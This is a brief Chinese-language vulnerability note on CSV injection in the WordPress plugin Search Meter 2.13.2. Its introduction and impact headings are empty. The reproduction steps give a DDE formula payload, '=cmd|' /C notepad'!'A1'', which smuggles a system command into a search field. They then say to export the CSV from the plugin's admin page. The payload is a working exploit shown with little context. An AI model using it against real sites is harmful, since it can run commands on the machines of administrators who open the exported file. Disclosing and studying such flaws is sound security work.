WordPress Plugin - Search Meter 2.13.2 CSV Injection

一、漏洞简介

二、漏洞影响

三、复现过程

<!-- -->
- =cmd|' /C notepad'!'A1'

<!-- -->
- 然后访问 http://www.0-sec.org/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php 并且到处csv文件